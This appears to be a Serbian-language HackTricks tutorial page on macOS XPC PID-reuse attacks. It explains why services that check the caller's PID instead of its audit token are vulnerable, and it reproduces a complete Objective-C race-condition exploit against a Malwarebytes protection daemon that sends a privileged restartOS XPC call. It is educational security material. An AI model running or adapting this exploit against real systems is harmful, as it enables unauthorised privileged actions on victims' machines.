HackTricksmacOS PID Reuse
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PID Reuse
Kada XPC servis na macOS-u proverava pozvani proces na osnovu PID-a a ne na osnovu audit token-a, ranjiv je na napad ponovne upotrebe PID-a. Ovaj napad se zasniva na trci gde eksploit šalje poruke XPC servisu zloupotrebljavajući funkcionalnost i tek nakon toga izvršava posix_spawn(NULL, target_binary, NULL, &attr, target_argv, environ) sa dozvoljenim binarnim fajlom.
Ova funkcija će učiniti da dozvoljeni binarni fajl preuzme PID, ali bi maliciozna XPC poruka bila poslata neposredno pre toga. Dakle, ako XPC servis koristi PID za autentifikaciju pošiljaoca i proverava ga Nakon izvršenja posix_spawn, pomisliće da dolazi iz ovlašćenog procesa.
Primer eksploita
Ako pronađete funkciju shouldAcceptNewConnection ili funkciju koja je pozvana iz nje koja poziva processIdentifier i ne poziva auditToken. To verovatno znači da verifikuje PID procesa a ne audit token.
Kao na primer na ovoj slici (uzeta iz reference):
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Proverite ovaj primer eksploita (ponovo, uzet iz reference) da vidite 2 dela eksploita:
- Jedan koji generiše nekoliko forkova
- Svaki fork će poslati payload XPC servisu dok izvršava
posix_spawnodmah nakon slanja poruke.
caution
Da bi eksploit radio, važno je export`` ``OBJC_DISABLE_INITIALIZE_FORK_SAFETY=YES ili staviti unutar eksploita:
asm(".section __DATA,__objc_fork_ok\n"
"empty:\n"
".no_dead_strip empty\n");
Prva opcija koristi NSTasks i argument za pokretanje dece da bi se iskoristila RC
// Code from https://wojciechregula.blog/post/learn-xpc-exploitation-part-2-say-no-to-the-pid/
// gcc -framework Foundation expl.m -o expl
#import <Foundation/Foundation.h>
#include <spawn.h>
#include <sys/stat.h>
#define RACE_COUNT 32
#define MACH_SERVICE @"com.malwarebytes.mbam.rtprotection.daemon"
#define BINARY "/Library/Application Support/Malwarebytes/MBAM/Engine.bundle/Contents/PlugIns/RTProtectionDaemon.app/Contents/MacOS/RTProtectionDaemon"
// allow fork() between exec()
asm(".section __DATA,__objc_fork_ok\n"
"empty:\n"
".no_dead_strip empty\n");
extern char **environ;
// defining necessary protocols
@protocol ProtectionService
- (void)startDatabaseUpdate;
- (void)restoreApplicationLauncherWithCompletion:(void (^)(BOOL))arg1;
- (void)uninstallProduct;
- (void)installProductUpdate;
- (void)startProductUpdateWith:(NSUUID *)arg1 forceInstall:(BOOL)arg2;
- (void)buildPurchaseSiteURLWithCompletion:(void (^)(long long, NSString *))arg1;
- (void)triggerLicenseRelatedChecks;
- (void)buildRenewalLinkWith:(NSUUID *)arg1 completion:(void (^)(long long, NSString *))arg2;
- (void)cancelTrialWith:(NSUUID *)arg1 completion:(void (^)(long long))arg2;
- (void)startTrialWith:(NSUUID *)arg1 completion:(void (^)(long long))arg2;
- (void)unredeemLicenseKeyWith:(NSUUID *)arg1 completion:(void (^)(long long))arg2;
- (void)applyLicenseWith:(NSUUID *)arg1 key:(NSString *)arg2 completion:(void (^)(long long))arg3;
- (void)controlProtectionWithRawFeatures:(long long)arg1 rawOperation:(long long)arg2;
- (void)restartOS;
- (void)resumeScanJob;
- (void)pauseScanJob;
- (void)stopScanJob;
- (void)startScanJob;
- (void)disposeOperationBy:(NSUUID *)arg1;
- (void)subscribeTo:(long long)arg1;
- (void)pingWithTag:(NSUUID *)arg1 completion:(void (^)(NSUUID *, long long))arg2;
@end
void child() {
// send the XPC messages
NSXPCInterface *remoteInterface = [NSXPCInterface interfaceWithProtocol:@protocol(ProtectionService)];
NSXPCConnection *xpcConnection = [[NSXPCConnection alloc] initWithMachServiceName:MACH_SERVICE options:NSXPCConnectionPrivileged];
xpcConnection.remoteObjectInterface = remoteInterface;
[xpcConnection resume];
[xpcConnection.remoteObjectProxy restartOS];
char target_binary[] = BINARY;
char *target_argv[] = {target_binary, NULL};
posix_spawnattr_t attr;
posix_spawnattr_init(&attr);
short flags;
posix_spawnattr_getflags(&attr, &flags);
flags |= (POSIX_SPAWN_SETEXEC | POSIX_SPAWN_START_SUSPENDED);
posix_spawnattr_setflags(&attr, flags);
posix_spawn(NULL, target_binary, NULL, &attr, target_argv, environ);
}
bool create_nstasks() {
NSString *exec = [[NSBundle mainBundle] executablePath];
NSTask *processes[RACE_COUNT];
for (int i = 0; i < RACE_COUNT; i++) {
processes[i] = [NSTask launchedTaskWithLaunchPath:exec arguments:@[ @"imanstask" ]];
}
int i = 0;
struct timespec ts = {
.tv_sec = 0,
.tv_nsec = 500 * 1000000,
};
nanosleep(&ts, NULL);
if (++i > 4) {
for (int i = 0; i < RACE_COUNT; i++) {
[processes[i] terminate];
}
return false;
}
return true;
}
int main(int argc, const char * argv[]) {
if(argc > 1) {
// called from the NSTasks
child();
} else {
NSLog(@"Starting the race");
create_nstasks();
}
return 0;
}
Ostali primeri
Reference
- https://wojciechregula.blog/post/learn-xpc-exploitation-part-2-say-no-to-the-pid/
- https://saelo.github.io/presentations/warcon18_dont_trust_the_pid.pdf
tip
Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.